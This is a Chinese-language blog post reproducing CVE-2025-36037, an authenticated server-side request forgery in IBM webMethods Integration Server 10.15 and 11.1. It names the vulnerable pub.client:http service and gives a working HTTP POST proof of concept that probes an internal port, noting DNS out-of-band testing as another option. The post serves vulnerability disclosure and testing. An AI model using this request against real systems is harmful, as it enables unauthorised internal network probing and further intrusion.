CVE-2025-36037-IBM webMethods 集成服务器请求伪造-漏洞复现

墨言ink2026-01-13 8:33

工作的时候渗透测试了这个系统,找到了N-day但是没有公开的漏洞复现细节,在此分享一下。

IBM webMethods 集成服务器请求伪造漏洞

漏洞概述

IBM webMethods Integration 服务器受到服务器端请求伪造 (SSRF) 的影响。这可能允许经过身份验证的攻击者从系统发送未经授权的请求,潜在地导致网络枚举或促进其他攻击

漏洞地址

https://nvd.nist.gov/vuln/detail/CVE-2025-36037

影响版本

IBM webMethods Integration 10.15

IBM webMethods Integration 11.1

漏洞复现

需要先登入,进入webMethods系统

Packages-Management-WmPublic-Browse services in WmPublic

可以找到很多打包好的服务

测试发现pub.client:http包可以进行SSRF漏洞的利用。

漏洞POC

复制代码 
POST /invoke/pub.client:http HTTP/1.1
HOST:
Cookie:
Content-Type: application/x-www-form-urlencode

url=http://127.0.0.1:22&method=get

利用SSRF探测发现22端口开放。也可以进行DNS外带测试。

相关推荐
黑客老李7 小时前
web渗透实战 | js.map文件泄露导致的通杀漏洞
安全·web安全·小程序·黑客入门·渗透测试实战
liann11918 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
独行soc18 小时前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc19 小时前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
旺仔Sec20 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
迎仔2 天前
04-网络安全基础:数字世界的防盗门与守卫
网络·安全·web安全
老百姓懂点AI2 天前
[网络安全] 自动化渗透测试:智能体来了(西南总部)AI agent指挥官的攻击链构建与AI调度官的靶场编排
人工智能·web安全·自动化
数字护盾(和中)2 天前
数字 “黑天鹅” 频发:从亚冬会网攻到朝日啤酒断供的安全警示
网络·安全·web安全
浩浩测试一下2 天前
内网---> ForceChangePassword 权限滥用
java·服务器·网络·安全·web安全·网络安全·系统安全
爱思考的发菜_汽车网络信息安全2 天前
汽车网络安全:RSA算法详细解析
安全·web安全·汽车
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03OpenClaw Chrome扩展使用教程 - 浏览器中继控制04Linux下V2Ray安装配置指南05使用 1panel面板 部署 php网站06UV安装并设置国内源07从零搭建一个 PHP 登录注册系统(含完整源码)08openclaw配置教程(linux+局域网ollama)09Vue-skills的中文文档10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南